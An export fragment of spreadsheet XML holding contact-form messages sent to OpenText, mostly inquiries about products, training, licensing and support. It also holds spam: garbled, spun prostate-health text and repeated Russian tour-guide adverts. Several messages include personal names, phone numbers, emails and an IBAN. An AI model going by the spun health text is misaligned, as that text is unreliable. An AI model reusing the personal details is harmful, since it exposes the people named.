Non-bacterial prostatitis accounts for approximately 90% of prostatitis cases; however, researchers have not yet to determine the cause of these conditions. Some researchers believe that chronic non-bacterial prostatitis occur due to unknown infectious agents while other believ</t>
  </si>
  <si>
    <t>The prostate gland is an essential portion of a male's the reproductive system. It secretes fluids that help the transportation and activation of sperm. The men's prostate is situated just as you're watching rectum, below the bladder and around the urethra. When there is prostate problem, it will always be really really irritating and inconvenient for your patient as his urinary method is directly affected. _x000D_
 _x000D_
The common prostate health issues are prostate infection, enlarged prostate and prostate cancer. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, also called prostatitis, is the most common prostate-related problem in men younger than 55 years. Infections of the prostate are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis could be the least common coming from all kinds of prostate infection. It is brought on by bacteria based in the large intestines or urinary tract. Patients may feel fever, chills, body aches, back pains and urination problems. This condition is treated through the use of antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to relieve the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is a condition connected with a particular defect within the gland along with the persistence presence of bacteria inside urinary tract. It can be due to trauma for the urinary tract or by infections via the rest with the body. A patient may go through testicular pain, spine pains and urination problems. Although it is uncommon, it is usually treated by removal in the prostate defect as well as the employment antibiotics and NSAIDs to take care of the redness. _x000D_
 _x000D_
Non-bacterial prostatitis makes up about approximately 90% of all prostatitis cases; however, researchers have not yet to create the cause of these conditions. Some researchers believe chronic non-bacterial prostatitis occur as a result of unknown infectious agents while other think that int</t>
  </si>
  <si>
    <t xml:space="preserve">good day, i'm struggling to access testdrive even after i have registered and click on the email received to provide the 24 hour access via a token._x000D_
_x000D_
Could you please advise and how to correct as i have a demo on the 11 September 2018._x000D_
_x000D_
thanks_x000D_
Gary_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
we need technical info abt our  Guidance hardware Tableau TD2u S/N 000ecce200751010,_x000D_
we d like to know if it would be possible  and how to duplicate a CD rom by a read/write Samsung portable  DVD using  usb port and   also to duplicate a 3g dongle using same USB port , thats why we got no response from  the hardware._x000D_
Thnx in advance for your kindle attention,waiting for your response_x000D_
_x000D_
best regards_x000D_
_x000D_
Annibale De Masi_x000D_
</t>
  </si>
  <si>
    <t>Hello, I recently applied to renew my Encase certification (#15-0912-5535) and have not heard back.  The renewal form and supporting documents were submitted via email per OpenText instructions.  I was unable to get ahold who could provide information when I called customer service. Please let me know if you've received my renewal and what the status is. Thank you.</t>
  </si>
  <si>
    <t>SI</t>
  </si>
  <si>
    <t>Hi; Looking for an onsite, closed training for 3-0715 Archive Center Installation and Administration. Please contact me for the offer. Thanks and kind regards, Spela</t>
  </si>
  <si>
    <t xml:space="preserve">Just saw the Healthcare Direct product for Right Fax and I was just curious on specific use cases for this product? Also wasn't sure if Ascension had this product to go along with their RightFax Solution? </t>
  </si>
  <si>
    <t>Checking on order status for MQ10361.</t>
  </si>
  <si>
    <t>Hi, all the time i used to check website posts here early in the daylight, for the reason that i like to gain knowledge of more and more.</t>
  </si>
  <si>
    <t>We are looking for the DMS that will support our purchase invoice flow, connects it with POs workflows, at this same time provide us with tools to manage incoming and outgoing mail. As we are in Poland - the cloud solution should be based on EUROPE located servers. Have you got a partner in Poland? We are using NAV 2017 - that dms has to integrate with it.The user base is around 40 users; invoices 300+ per month; other documents 300+ per month</t>
  </si>
  <si>
    <t xml:space="preserve">My agency just purchased the DF220 - Navigating EnCase Version 8 OnDemand course for me. If possible, can I please get access to the course ASAP as I would like to start it on Monday 9/10. Thank you. </t>
  </si>
  <si>
    <t>I have a client who needs to get setup for UPC listing with OpenText. Please let me know how I can get that setup. Thanks.</t>
  </si>
  <si>
    <t>Hello my name is Anna Klara, I study at the university in germany. I have to compare four ECM-tools and opentext is one of than. I'm looking vor some informations about opentext like integration, database, devices supported, features etc. Have you maybe a list where I can find this informations?_x000D_
Best regards,_x000D_
Anna Klara Cominelli</t>
  </si>
  <si>
    <t>I need access to Opel GEPARA. I have an access to GM Supply Power via Covisint._x000D_
Opel GEPARA is in the list of my accesses but I'm not able to open it</t>
  </si>
  <si>
    <t>Loan for car plus insurance</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
                                        _x000D_
Greetings from Xtelesis!_x000D_
_x000D_
Thank you for your valuable time. Kindly find our company profile for your kind perusals.         _x000D_
_x000D_
Do contact us for Passive cabling ,Internet Lease Line, Data Networking, Audio/Video Conferencing, Security, IP Telephony ,Toll free Numbers, and complete IT Solutions._x000D_
_x000D_
About Us:-_x000D_
Xtelesis Datacom is A Premier Network Integration Company offering network consulting, design, deployment and managed services. Xtelesis Datacom located in Bengaluru is subsidiary of Xtelesis Corporation Headquartered in Burlingame, California. Xtelesis Corporation was started in 1997 and is now positioned itself as a full-service data and voice network design, implementation and management company. Our range of customers span across verticals of BSFI, Healthcare, Government, IT, ITES, Manufacturing, Small and Medium Enterprises._x000D_
_x000D_
Xtelesis Key Solutions:-_x000D_
	IP Telephony - IP PBX, IP Phone Systems._x000D_
	Networking Solutions - Wired and Wireless Networking Solutions, Security._x000D_
	Corporate Solutions - ILP, MPLS, PRI, SIP Trunks, VPN._x000D_
	Conferencing Solutions - Audio and Video conferencing solutions, headsets._x000D_
	Cloud Business Telephony - Knowlarity Communications._x000D_
	IT Solutions - M-files, Servers, Desktops and Laptops._x000D_
_x000D_
Xtelesis Key Support Services:-_x000D_
	Mitel (ShoreTel) Partner Support._x000D_
	Cisco Smart Net Total Care._x000D_
	Juniper Care._x000D_
	Aruba Care._x000D_
	Sophos Support._x000D_
_x000D_
Partners:-  _x000D_
    _x000D_
Thanks &amp; Regards,_x000D_
_x000D_
Md Shariff…_x000D_
Business Manager_x000D_
+ 91- 9980755779</t>
  </si>
  <si>
    <t>Förfrågan gällande support i vårt avtal EU00167396 - Samhall AB</t>
  </si>
  <si>
    <t>Query regarding SMS renewal quote for EnCase products. I was previously dealing with John SMITH in respect of this.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
will there be trainings this year in Munich?_x000D_
_x000D_
3-2105 Vendor Invoice Management (VIM) for SAP® Solutions Consultant Bootcamp_English (vormals 250)_x000D_
_x000D_
Regards,_x000D_
Denis_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Become a Test Center</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, da wir uns aktuell nach einer neuen Vertragsmanagement-Lösung umsehen, würde ich mich freuen, wenn Sie mit mir Kontakt aufnehmen. Herzliche Grüße, Andreas Schneider</t>
  </si>
  <si>
    <t>We would like to get quote for RB could you please let me know if can be use as trial ?</t>
  </si>
  <si>
    <t>Need for job</t>
  </si>
  <si>
    <t>Spinner du contenu donne la possibilité d'optimiser génération de contenus unique de manière aisée. cette technique consiste à paraphraser des textes déjà existant, permettant de gagner du temps efficacement. Il existe plusieurs logiciels et outils de spinning de contenu mais aucun ne permet d’effectuer des textes de qualité sans perdre trop d'implication. Avec Content-spinning. fr, vous pouvez enfin automatiser la création de vos master-spins !</t>
  </si>
  <si>
    <t>Hi _x000D_
 _x000D_
The State Library of New South Wales is currently researching platforms for our new digital asset management and delivery system_x000D_
_x000D_
We have reviewed the information available on your website and now seek further information about your product(s) and services via a 45 min - 1-hour tele conference or face to face meeting._x000D_
To assist your preparation for the tele conference, we have a list of requirements/questions that we will send prior to the meeting._x000D_
_x000D_
As the nature of many of our questions are technical, it would be appreciated if you could also make a member of the technical team available for the meeting. _x000D_
_x000D_
If you choose to participate in this, we would like to schedule the meeting/tele conference. Please select one of the time slot below. Due to our tight time-frames we would like to have this discussion at the proposed time (or within 1 or 2 days of the proposed time). If this time is not possible, we appreciate if you could send through a couple of preferred dates/times. _x000D_
_x000D_
Date and Times:_x000D_
_x000D_
•	13th of September, 11:30am to 12:30pm AEST. Duration 1 hour_x000D_
_x000D_
•	14th of September, 9:30am to 10:30pm AEST. Duration 1 hour_x000D_
_x000D_
•	14th of September, 12:30am to 13:30pm AEST. Duration 1 hour_x000D_
_x000D_
•	14th of September, 14:00pm to 15:00pm AEST. Duration 1 hour_x000D_
_x000D_
•	17th of September, 11:30am to 12:30pm AEST. Duration 1 hour_x000D_
_x000D_
•	17th of September, 14:00pm to 15:00pm AEST. Duration 1 hour_x000D_
_x000D_
•	18th of September, 10:00:am to 11:00am AEST. Duration 1 hour_x000D_
_x000D_
•	18th of September, 11:30am to 12:30pm AEST. Duration 1 hour_x000D_
_x000D_
_x000D_
For each question below, please state if (yes/no) your solution supports the requirement and how it supports it. Provide documentation/example sites where appropriate. _x000D_
 _x000D_
1.	How does your software support relationships between objects and data? Do your data structures support simple and complex relationships. Can we also define relationships with external resources such as a URL? _x000D_
_x000D_
2.	What file formats do you support and do your out of the box</t>
  </si>
  <si>
    <t>Upgrade windows 2008 fax server for small medical clinic.</t>
  </si>
  <si>
    <t>I'm looking for training on configuring and implementing Content Server autoclassification, preferably online or via written documentation. Please advise if anything is available.</t>
  </si>
  <si>
    <t>I am doing my senior thesis on forensics.  Is it possible to get a short trial for a student?</t>
  </si>
  <si>
    <t>I noticed that you'll be at MS Ignite this year and wanted to find out if your company was hosting any events outside of the conference. If so let me know as I would like to attend and find out more about your company._x000D_
Sincerely,_x000D_
Edward</t>
  </si>
  <si>
    <t>Quote Request - Veterans Affairs</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are reviewing enterprise CMS and DAM systems. We are looking for the following at a high level:_x000D_
- Multi-client / Multi-tenant (agency model)_x000D_
- On premise and load balanced_x000D_
- support various types of content from pure text to pdf &amp; doc files_x000D_
- customizable workflow_x000D_
- API access_x000D_
- SSO</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Mark and I manage technology partnerships and sponsorships for the Drupal Association.  We're a global non-profit that helps support one of the largest open source projects in the world. We have our flagship developer events that bring Drupal businesses and the community together next week in Frankfurt, Germany and next April in Seattle, Washington. Our attendees are interested in enterprise insight solutions and I wanted to reach out to OpenText.  Are you available to discuss OpenText + Drupal, our event and possible opportunities for partnership?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>What's your external Tech Support email address to give to customers?</t>
  </si>
  <si>
    <t>I am a consultant and I am currently in a consultancy with the company Equion Energy- Colombia, this company wants  do tests with opentext ETX on Linux platform with the application openworks 2D and 3D. We want to know if we count on you to perform these tests?</t>
  </si>
  <si>
    <t>I am researching digital asset management systems. Ideally, there will be 2 power users, 10 general users, and 1TB of storage. Do you have a pdf that outlines the features? What is the pricing?</t>
  </si>
  <si>
    <t>Hello, we're looking for more information on OpenText RightFax. We would like to have a software that we could use to send and receive fax online. What packages or offers do you have available? Please e-mail us at sortega@arisglobal.com. We look forward to working with you.</t>
  </si>
  <si>
    <t>We currently have the OpenText Fax Appliance. I would like information on RightFax.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for the sales representative contact details for the InfoArchive  by Opentxt. Kindly request to provide me the details </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam,_x000D_
_x000D_
I hope you are well._x000D_
_x000D_
My name is Dr. Liam Owens, I am the founder and CEO of Semantics 21 a company specialising in categorisation of CSE material along with victim identification._x000D_
_x000D_
I have spoken with your technical teams on a number of accessions, and you have previously provided me with access to EnCase so that I was able to generate an EnScript so that our mutual clients could export data to and from each others applications which works well to date._x000D_
_x000D_
A quick question, we are hoping to add the logos of some of the various digital forensic suppliers which we support to some of our marketing material (flyers, website etc) - may I please ask for permission to include your companies icon on this material so that users are aware the ability to import/export to and from each others tools? I am able to provide a sample of this marketing material on request._x000D_
_x000D_
I hope this is OK for yourself and team, and look forward to hearing from you,_x000D_
_x000D_
Thanks again,_x000D_
Liam </t>
  </si>
  <si>
    <t>Regarding job openings</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
One of our customers recommended your service for turning production certificates/data into EDI. I was hoping to speak with a representative about your capabilities. _x000D_
_x000D_
Regards, _x000D_
Andrew Bettin </t>
  </si>
  <si>
    <t>Добро пожаловать в удивительную страну - гостеприимный Израиль. Вашему вниманию индивидуальные экскурсии для продуктивного вояжа по стране на автомобиле экскурсовода. _x000D_
Ваш личный гид в Израиле Евгений Скальт позаботится о: впечетляющей программе экскурсий, крыше над головой и удобном ночлеге; национальной еде; безопасности и медицинской помощи, легком передвижении по стране. _x000D_
Скальт Евгений - русскоязычный гид в Израиле с большим опытом и багажом знаний о стране и ее истории. _x000D_
Вашему вниманию также экскурсии в Палестину по официальной лицензии, все об оздоровлении организма в Израиле, возможностях лечения на Мертвом море и во всех уникальных местах страны. Индивидуальный русскоязычный гид в Иерусалиме гарантирует незабываемое и продуктивное времяпровождение для тех, кто жаждет знаний. _x000D_
Израильский кошерный чай, настоящий израильский завтрак, цимес медовый, правильные сувениры и колорит. Вы получите максимум от поездки! _x000D_
Ваш гид с машиной в Израиле Евгений Скальт ждет заявок по нужным датам, спешите забронировать время для экскурсий. _x000D_
Гид в Израиле - [url=http://www.исрагид.рф]гид по израилю индивидуальный[/url]</t>
  </si>
  <si>
    <t>Would like to arrange a demo of eDocs</t>
  </si>
  <si>
    <t>Bom dia! _x000D_
_x000D_
Estamos em fase de prospecção de parcerias para o desenvolvimento, implantação e suporte para o projeto DeView (Delivery View) na Unilever Brasil._x000D_
_x000D_
Em resumo nosso projeto consiste no uso de uma plataforma que enviará automaticamente via e-mail os XMLs+PDFs das NFes existentes num mesmo veículo._x000D_
_x000D_
Aguardo contato._x000D_
_x000D_
Atenciosamente,_x000D_
Kleber</t>
  </si>
  <si>
    <t>Would like to know the cost of a new eDocs Open Text program.  Small office with two attorneys and one assistant.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working with CEATI (basically an EPRI type organization of Canada) on a substation on-line monitoring guideline for their members and was hoping that you could fill out a survey about your products that we would include in the report.  Additionally, CEATI will be having a substation monitoring conference next year for their member utilities and we would like to know your interest in participating with a presentation.  My mobile is best 610 608-6283.   </t>
  </si>
  <si>
    <t>We are already a customer of EnCase....but we are looking on to add new modules  such eDiscovery, ect....We would like to schedule a demo for new features. This is our current _x000D_
Dongle ID: X100008059606. I was try to reach Steven Lee which was our last Sales Engineer._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">Training Quote </t>
  </si>
  <si>
    <t>Hello, I am reaching out because our start up is looking to purchase an employee management software. Due to our clientle population, many of our prospective employees do not have access to a computer and we have them fill out paper applications. Transfering all of this data on to a computer is labor intensive so we are looking to streamline that process and the tracking of our employees after they have been hired. Please reachout to me and let me know if any of your software could help us with our situation. Also, we are a staffing company and we work with anywhere from 45-60 employees at a time. However, our numbers have been much higher at certain times as well.</t>
  </si>
  <si>
    <t>Looking for a strong digital fax solution.  Ability to send and receive faxes from Oultook, Office 365.</t>
  </si>
  <si>
    <t xml:space="preserve">Sales man a looking for ajop </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I cannot open a technical support ticket. On the website it says "You have no grants", and if I write an email to de-support@opentext.com, I get an automatic reply message. Could you please help me with this issue?_x000D_
_x000D_
Thank you,_x000D_
Egor Alekhov</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
im Rahmen eines Updates unserer OpenText Version von 11 auf 16 benötigen wir eine Testversion._x000D_
Können Sie mich diesbezüglich morgen beraten?_x000D_
Vielen Dank!_x000D_
Mit freundlichen Grüßen_x000D_
Thomas Krämer_x000D_
Verlag Dr. Otto Schmidt</t>
  </si>
  <si>
    <t>Please send me a w-9 form so that this company can be set-up as a vendor with the University. A faculty member named Denise Dragos is planning to make a purchase. Thank you.</t>
  </si>
  <si>
    <t>we have many mutual customers here in UK, I am trying to acertain the optimal settings for the Isilon storage platform to support the EnCase application. to do this is itpossible to read a copy of the installation manual and administration guide? _x000D_
Thanks _x000D_
Tim</t>
  </si>
  <si>
    <t xml:space="preserve">need to switch our fax number to a eFax </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for the correct US account manager for T-Systems. We have an RFP coming and we are looking for a contact that can help us register the deal quickly. </t>
  </si>
  <si>
    <t>I took the Encase eDiscovery Training Course with you in Dulles VA the week of July 24, 2018 with Daniel Smyth.  He said he would send us a link to download information from the class but I have not received it.  I have emailed Mr. Smyth twice but have not received a response.</t>
  </si>
  <si>
    <t>Brand-loyalty, our SAP-VAR customer have an urgent problem._x000D_
we opened a ticket at SAP OSS : Incident Data at SAP  _x000D_
Number: 0120050409  0000041847 2018 _x000D_
 But they request to contact you._x000D_
Brand Loyalty International BV say :_x000D_
We have purchased the VIM functionality and are trying to download the installation files for VIM 7.5 SP7 on our SAP ECC environment (SAP_APPL 619, EHP 8). _x000D_
Client number: 0001112761_x000D_
Installation number: 0020605943_x000D_
_x000D_
Following OSS note 2068615 ( SAP Invoice Management by Open Text 7.5) we tried downloading the installation files via the following link:_x000D_
_x000D_
However, a opentext user was needed and after registration, not enough rights were available. Via the opentext helpdesk, I ended up at the SAP helpdesk. And until now, no installation files can be found nor can these be sent._x000D_
_x000D_
SAP helpdesk indicated that an OSS message is needed. _x000D_
_x000D_
Please create the ticket so we can finally received the installation files (which are non-HANA)?_x000D_
_x000D_
_x000D_
PLEASE CONTACT URGENTLY : _x000D_
Katja Philippo of  Brand Loyalty_x000D_
+31 6 52850619</t>
  </si>
  <si>
    <t>i registered at Open text and create my user ID then i made confirmation from my mail. but still i have a problem when i tried to access the knowledge base link so please advise!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
On your website I tried to register my intrest in the following course._x000D_
DF320 — Advanced Analysis of Windows Artifacts with EnCase (in Reading, UK)_x000D_
_x000D_
A colleague of mine did the same thing. We did the registration around 9  this morning Swedish time. The problem is that my colleague a few minutes later got a confirmation mail that he is registered. But I did not._x000D_
_x000D_
So my question is - are there something wrong with my registration for the class or do I have to register once more._x000D_
_x000D_
Regards_x000D_
Mats Björnsson_x000D_
Swedish Tax Agency </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am looking for new SAP project. I just relocated from US due to family issues._x000D_
I am in to SAP HANA/S4 HANA/BODS/BPC/BW/FI-CO/ABAP/Business Objects/Tableau._x000D_
_x000D_
My Phone number: 91- 630 435 2815</t>
  </si>
  <si>
    <t>Hi_x000D_
Can you please confirm what software is required to install on a windows 12 server box. There will only be 1 user connecting or accessing the NFS share. Will this OpenText NFS Client be sufficient?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to request a trial for Hummingbird 13.01.235. </t>
  </si>
  <si>
    <t>Purchase of a tool</t>
  </si>
  <si>
    <t>Hej,_x000D_
har en kund som har Streamserver persuasion SP5 version 5.5.0 som körs på windows 2008 server. Behöver flytta det till en 2016 server. Vad finns det för alternativ för att göra det.</t>
  </si>
  <si>
    <t>We are conducting a study on behalf of our banking industry client, based in South Africa. We came across your company during our secondary research and found you a suitable company as per our client requirements of purchasing ECM solution._x000D_
Hence, we have forwarded your name to our client. However to move ahead in its purchase decision of the ECM software, the client just wants to see whether OpenText can offer the capabilities required by the client or not?_x000D_
Can we schedule a short call or get in touch with the respective person? It would be very helpful.</t>
  </si>
  <si>
    <t>We will like to know the who is your local partner in Singapore/Asia to Licence - Commercial Software &amp; Apps Support. Our support is ending in 31 Oct 2018, please treat request as urgent. _x000D_
_x000D_
Our current vendor is Matrix Invent MSC Sdn Bhd. Are they the only vendor for Singapore/Asia. _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
My name is Rida from Bounga Solusi Inforamtika (OT Auth. Partner for Indonesia)._x000D_
I contacted the APAC Account Executive, Dexter Lyu but it appears that he is on holiday._x000D_
I need 2(two) different quotes for:_x000D_
1. EnCase Forensic v8 (inc. SMS 1Yr) - qty 3_x000D_
2. EnCase Forensic v8 (inc. SMS 1Yr) - qty 1_x000D_
_x000D_
These are for 2(two) different projects at the same government institution._x000D_
Company name: BSSN (Badan Siber dan Sandi Negara) / Cyber and National Encryption Agency._x000D_
Address: Jl. Harsono RM No.70 Ragunan Ps.Minggu Jakarta Selatan - Indonesia 12550_x000D_
_x000D_
Looking forward to hearing from you._x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
da wir sie als neuen Lieferanten in unserem System anlegen benötigen wir gemäß den Richtlinien unseres internen Kontrollsystems_x000D_
eine kurze Bestätigung der Richtigkeit der auf ihrer o.a. Rechnung angegebenen Bankverbindung:_x000D_
GB88CITI18500817495781_x000D_
BIC: CITIGB2L_x000D_
Die Rechnung kann erst nach Erhalt ihrer Bestätigung zur Zahlung freigegeben werden._x000D_
Diese Anfrage stellt keine Anerkennung eines Anspruchs dar, sondern dient lediglich dem Vorbeugen von Betrugsfällen._x000D_
HerzlicheGrüße!_x000D_
</t>
  </si>
  <si>
    <t>Request for Open Text License Quote</t>
  </si>
  <si>
    <t>Java Opportunities</t>
  </si>
  <si>
    <t>necesito cotización para adquirir licencia de first class, gracias</t>
  </si>
  <si>
    <t>My company is looking for a software for keeping/maintaining our residents database. Some of the key features we require are as follows: _x000D_
_x000D_
-          Secure_x000D_
-          Audit trail of what the user did in the system _x000D_
-          Multiple user logins with varying access rights _x000D_
-          Able to import/export - excel format_x000D_
-          Capable of customisation to accommodate to all/most of the fields we have_x000D_
_x000D_
I am looking at Record management system, could you recommend which is best suited software for my needs, and please let me know the cost including maintenance for these software too._x000D_
_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I currently have access to your online resources but not all of the resources that I need to perform a server migration and software update. I am not able to see anything about licensing. The company I work for was Internal Medicine Associates of Lee County and we were acquired by Millennium Physician Group. My access is currently under email address rwilliams@imadoctors.com. I would like access to the online resources for IMA. We also need to ultimately transfer everything to the new company name.</t>
  </si>
  <si>
    <t>Hello, _x000D_
Please sent a formal quote for DF210 - building an investigation._x000D_
_x000D_
Regards,_x000D_
_x000D_
Tom</t>
  </si>
  <si>
    <t>Добро пожаловать в удивительную страну - гостеприимный Израиль. Вашему вниманию индивидуальные экскурсии для продуктивного вояжа по стране на автомобиле экскурсовода. _x000D_
Ваш индивидуальный гид в Израиле Евгений Скальт позаботится о: незабываемой экскурсионной программе, крыше над головой и удобном ночлеге; вкусной еде; безопасности, легком передвижении по стране. _x000D_
Евгений Скальт - русскоязычный гид в Израиле с многолетним опытом и копилкой знаний о Земле Обетованной. _x000D_
Вашему вниманию также экскурсии по официальной лицензии в Палестине, все об оздоровительных программах в Израиле, возможностях лечения на Мертвом море и не только. Индивидуальный русскоязычный гид в Иерусалиме обеспечит незабываемое и продуктивное времяпровождение для тех, кто жаждет знаний. _x000D_
Израильский кошерный чай, настоящий завтрак израильский, сладкий цимес, правильные сувениры и колорит. Вы получите максимум от поездки! _x000D_
Ваш индивидуальный гид в Израиле Евгений Скальт ждет заявок по нужным датам, спешите бронировать время для экскурсий. _x000D_
Частный гид в Израиле - [url=http://www.исрагид.рф]гиды русскоговорящие в израиле[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Researching ECM / Content Services </t>
  </si>
  <si>
    <t>Software: I’ve created a plug-in for the Business Anlaytics Suite and I feel that it could be seriously useful to many users. It’s availaible free (just google mapcite opentext),but I’m struggling with promotion. What avenues would you suggest?</t>
  </si>
  <si>
    <t xml:space="preserve">Natty Bug's Angel Wings is a 501c3 non-profit Organization which donates to Children's Hospital in Pittsburgh twice a year and year round to children in need. We have an upcoming Christmas Donation at Children's Hosp and would very much appreciate if you could help supply some items for the donation Drive. We also are trying to collect donated items for a very special 1 year old boy who is a recurring patient at Children's who suffers from CHD and Down's Syndrome among other life sustaining health issues. Rycker and his Mommy and Daddy finally were able to move into a house big enough to accommodate all his medical equipment but unfortunately barely have any furniture being that their last house was a 1 bedroom furnished apartment. Rycker loves elephants and giraffes. We would greatly appreciate anything you can do for either of these donations or both. Thank you for your time.  </t>
  </si>
  <si>
    <t>When modifying a user in RightFax Enterprise Fax Manager, it indicates that "this user is periodically updated by a synchronization process. you may edit this user but keep in mind that any properties being synchronized will be updated when the next sync occurs. do you want to edit this user?"_x000D_
_x000D_
Where is the sync setup and how can we disable or modify it?</t>
  </si>
  <si>
    <t xml:space="preserve">Currently we are investigating the use of OpenText Exceed in the design of a new system. We are interested in finding the planned software support end dates so that we may better plan for the design and support of our system. </t>
  </si>
  <si>
    <t>Service cancelled  8/2/18 at 1:12pm.  Our credit card was billed $14.95 on 8/1/18 and again on 8/22/18.  I am seeking refund for both charges.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, i want to know your BPM, because in my company we want to change a better tool of BMP </t>
  </si>
  <si>
    <t>I'd like to buy this book, because I'm writing an article about digital government</t>
  </si>
  <si>
    <t>Need to sign up for GXS Catalog asap. Please get back to me right away.</t>
  </si>
  <si>
    <t>Hello!_x000D_
We are looking for consultants and developers for Documentum. Do you know which local enterprises could have this services? _x000D_
Thank you. _x000D_
Regards,_x000D_
Dominique</t>
  </si>
  <si>
    <t xml:space="preserve">We currently run use Open Text as our CMS. Is there a plug in to create a pop up contact form? Thanks. </t>
  </si>
  <si>
    <t>I want help with an ECM Strategy consolidating all existing disparate systems. I need this urgently by COB tomorrow.</t>
  </si>
  <si>
    <t>Pricing and purchase information for Teleform single workstation. No installation or annual maintenance required.</t>
  </si>
  <si>
    <t>Need assistance deciding if it would be better to use new server with newer version, OpenText to configure, or use the cloud service OpenText has available.  I need this soon as our service contract on our current equipment/service runs out soon.</t>
  </si>
  <si>
    <t>I have this message in TeleForm Reader - Unable to save data from evaluation (V10.6 10644). and the system is forcing a shut down and its not responding.</t>
  </si>
  <si>
    <t>We have an OpenText account for JCPenney and I was wondering if we would need to pay an additional fee to set up an OpenText account for Macy's? If so, what is the cost?</t>
  </si>
  <si>
    <t>Trabalho na área de Business Solutions na Braskem e sou uma das responsáveis por trazer soluções alinhadas a estratégia do negócio da empresa. Atualmente possuo uma demanda sobre o atual Sistema de Distribuição de Documentação Jurídica (SDDJ), que é no MS Sharepoint, e estamos em busca de uma nova solução para o mesmo. Gostaríamos de realizar um primeiro contato para brifar a OpenText referente a nosso processo e entender se o ECM poderia nos atender neste cenário.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like a demo of OpenText Cloud with basic document management in OpenText Content Suite. I need to understand features available in the cloud, and pricing options.  </t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
Kindly help me if any suitable opening are presents._x000D_
_x000D_
Thanks_x000D_
Shivaram</t>
  </si>
  <si>
    <t>RightFax</t>
  </si>
  <si>
    <t>Estamos prospectando ferramentas de ECM , para um grande projeto de GED na companhia e gostaria do contato do Gerente de Relacionamento que atenda o NE._x000D_
_x000D_
Estamos localizados no Ceará.</t>
  </si>
  <si>
    <t>This may seem like an odd request, but we are looking for a large meeting room to rent.  We are organizing a Town Hall meeting on December 13 (afternoon). We are looking for somewhere close to our office, which is on 95 Mural Street.  Your Richmond Hill location is just down the street, and we wanted to know if you be able to accommodate us (approx 80 people)?  The CEO wants to do a presentation and there will be refreshments afterwards. Thanks!  Feel free to email or call me back to discuss.</t>
  </si>
  <si>
    <t xml:space="preserve">Insallation of Alchemy Web Application </t>
  </si>
  <si>
    <t>Need an enterprise License quote for Brava viewer Product( PDF, AutoCAD &amp; Microstation)</t>
  </si>
  <si>
    <t>order placed and paid for pay pal Receipt No: 1178-9721-6958-7163_x000D_
not received an access PIN for the product_x000D_
regards</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Would you please send me a copy of the W9 that has your new name Opentext on it?</t>
  </si>
  <si>
    <t>Enquiry - Courses 2019 - Are there any course dates for Encase 2 - Building an Investigation with EnCase in 2019? I am looking at booking an on-site course (Reading, UK) either January/February. Thank you.</t>
  </si>
  <si>
    <t>Request for demo</t>
  </si>
  <si>
    <t>Would like to speak to someone about OT Contract Services doing a health check of our current OT WEM &amp; Portal environment.  Review our list of current pain points to recommend both short term and long term fixes/config changes to address these issues.</t>
  </si>
  <si>
    <t>Voya Financial is looking to upgrade to DB2 Version 10.5fp9 and need to verify compatibility with xPression 4.5, which we are currently using.</t>
  </si>
  <si>
    <t>I'd like to explore EDI options that your company offers.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
können Sie mir Vertriebspartner für OpenText-Produkte in Deutschland nennen ?_x000D_
Mit freundlichen Grüßen_x000D_
Ralf Neumann</t>
  </si>
  <si>
    <t>Qatar National Bank reported the following problem:_x000D_
_x000D_
We face the below issue with Captaris workflow engine since years and we tried many times to raise it with Open Text but there was no resolution, therefore, we need your support to raise it with them and follow up on the same._x000D_
_x000D_
_x000D_
“We use Captaris Web Services to integrated our .NET presentation layer with the engine, so sometimes we don’t get the proper result when we call the advance method, in other words, the workflow engine fails to advance the workflow but at the same time the engine returns “TRUE” result”_x000D_
_x000D_
_x000D_
Who can assist for the above?</t>
  </si>
  <si>
    <t>Revise invoice contact information for account 853664.  Only Noreen Lucas should have the monthly invoice sent to her at nml4211@pharmerica.com.  No one else needs to be on the distribution list for this account.</t>
  </si>
  <si>
    <t>I am trying to figure out how to give my assistant general manager an email account in FirstClass.</t>
  </si>
  <si>
    <t>Sehr geehrter Damen und Herren,_x000D_
als langjähriger OpenText Kunde sind wir erstaunt, dass alle unsere Versuche einer Kontaktaufnahme mit benannten Ansprechpartnern unbeantwortet bleiben. Da ich in Ihrem Unternehmen niemanden erreichen kann, muss ich leider dies allgemeine Kontaktformular verwenden._x000D_
Mit freundlichen Grüßen,_x000D_
Andreas Goldammer</t>
  </si>
  <si>
    <t>Looking for a partner in SA</t>
  </si>
  <si>
    <t xml:space="preserve">We need a quote for the following, preferably by COB Friday 9/7:  _x000D_
_x000D_
